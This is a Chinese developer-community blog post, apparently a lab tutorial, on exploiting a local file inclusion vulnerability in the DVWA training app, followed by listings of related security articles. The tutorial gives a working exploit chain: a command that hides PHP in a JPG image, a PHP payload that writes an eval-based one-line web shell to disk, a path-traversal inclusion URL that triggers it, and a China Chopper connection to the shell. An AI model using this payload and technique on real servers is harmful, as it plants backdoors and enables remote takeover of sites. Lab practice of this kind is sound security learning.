35、本地文件包含漏洞

2023-02-17 54

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 35、本地文件包含漏洞

+关注继续查看

一、本地文件包含漏洞：

环境：DVWA，low级别

1、制作一句话图片木马

第一种方法：

windows命令

copy 1.jpg/b+1.php 2.jpg

第二种方法：

将照片拖入edjpgcom软件，添加下面这句话

<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>

2、上传图片木马文件

3、选择文件包含页面

4、执行文件包含并生成后门

192.168.152.188/dvwa/vulnerabilities/fi/？page=…/…/hackable/uploads/1.jpg

5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

6、菜刀链接

7a399525ddec4b77923c464820b33738 (1).png

二、环境：DVWA，medium级别

同low级别

禁止非法，后果自负

文章标签：

PHP

Windows

安全

sumith

潇湘信安

4天前

监控算法 Java

记一次从任意文件下载到getshell

潇湘信安

29 0 0

李火火

13天前

SQL Web App开发安全

Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取

Smanga存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。

李火火

56 0 0

panda墨森

5月前

存储安全 Shell

文件包含利用方式(个人总结)

利用思路总结：

panda墨森

72 0 0

sumith

8月前

编解码 JavaScript PHP

文件上传绕过的常见方式

sumith

203 0 0

sumith

8月前

安全 PHP

36、远程文件包含漏洞

sumith

45 0 0

郝奕程

10月前

编解码安全 Shell

CVE-2017-9993ffmpeg 任意文件读取漏洞环境

漏洞描述 2.8.12之前的FFmpeg、3.1.9之前的3.0.x和3.1.x、3.2.6之前的3.2.x和3.3.2之前的3.3.x未正确限制HTTP Live Streaming文件扩展名和解复用器名称，这允许攻击者通过特制的播放列表数据读取任意文件。环境搭建可以查看我的这篇文章 https://developer.aliyun.com/article/1113693?spm=a2c6h.26396819.creator-center.8.22fb3e18sKKMLR 目录为 /vulhub-master/ffmpeg/phdays 运行命令 ```sh docker-compose

郝奕程

260 0 0

士别三日wyx

安全中间件 Shell

文件包含漏洞利用方式-日志注入getshell

中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell 比如使用代理工具抓包,在HTTP请求中插入一句话木马,访问日志文件时会执行一句话木马,然后使用蚁剑等工具链接,从而getshell

士别三日wyx

455 0 0